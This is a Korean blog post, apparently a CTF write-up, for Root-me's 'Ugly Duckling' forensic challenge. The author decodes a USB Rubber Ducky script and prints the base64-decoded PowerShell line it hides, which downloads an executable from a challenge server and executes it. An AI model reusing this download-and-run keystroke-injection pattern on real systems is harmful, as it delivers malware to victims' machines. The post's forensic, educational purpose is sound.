vared
vared - Blog
vared
전체 방문자
오늘
어제
  • 분류 전체보기 (138)
    • Study (0)
    • Project (0)
    • Paper Review (0)
    • Tool (0)
    • WriteUp (124)
      • Root-me.org (44)
      • LOS_rubiya (32)
      • Webhacking.kr (21)
      • DreamHack (9)
      • XCZ.kr (8)
      • HackCTF (10)
    • Miscellaneous (0)
    • Forensic-CheatSheet (10)

블로그 메뉴

  • Category

공지사항

  • Forensic-CheatSheet 오픈

인기 글

태그

  • Artifacts
  • iconcahce
  • Windows Artifact
  • forensic artifacts
  • trim
  • ssd
  • LNK FIile
  • digital-forensics
  • Los
  • shellbag
  • shellbag forensics
  • JavaScript
  • sql injection
  • Digital-Forensic
  • File Execution
  • Thumbcache
  • Digital Forensic
  • forensic-cheatsheet
  • webhacking.kr

최근 댓글

최근 글

티스토리

hELLO · Designed By 정상우.
vared

vared - Blog

[Root-me] : Ugly Duckling
WriteUp/Root-me.org

[Root-me] : Ugly Duckling

2021. 1. 27. 16:30

한참을 고민하다 알아낸 것은 해당 바이너리 파일이 형식이 있다는 것이었다.

이렇게 생겨먹은 아이인데, duck script 를 이용해서 코드를 실행한다고 하니 복호화를 해보도록 하자.

ducktoolkit.com/decode#

에서 파일을 넣고 output을 받았다.

요런 이미지를 뜨게 하고, 특정 행동을 하도록 설계된 것이었따.

모든 행동을 본 결과 마지막으로 powershell로 무언가를 실행하는데, 암호화가 되어있었다. baset64로 디코딩해보니 결과가 나왔는데 다음과 같다.

iex (New-Object System.Net.WebClient).DownloadFile('http://challenge01.root-me.org/forensic/ch14/files/666c61676765643f.exe','666c61676765643f.exe');
heL^pj>6~w@@
@@@@@@@@@@
@@@@@@

 

해당 경로로 exe 파일을 다운받아 실행하니

flag 값이 나왔다.

저작자표시 (새창열림)

'WriteUp > Root-me.org' 카테고리의 다른 글

[Root-me] : Command & Control - level 3  (0) 2021.01.28
[Root-me] : Active Directory - GPO  (0) 2021.01.28
[Root-me] : Find the cat  (0) 2021.01.27
[Root-me] : Command & Control - level 5  (0) 2021.01.27
[Root-me] : Logs analysis - web attack  (0) 2021.01.27
    'WriteUp/Root-me.org' 카테고리의 다른 글
    • [Root-me] : Command & Control - level 3
    • [Root-me] : Active Directory - GPO
    • [Root-me] : Find the cat
    • [Root-me] : Command & Control - level 5
    vared
    vared

    티스토리툴바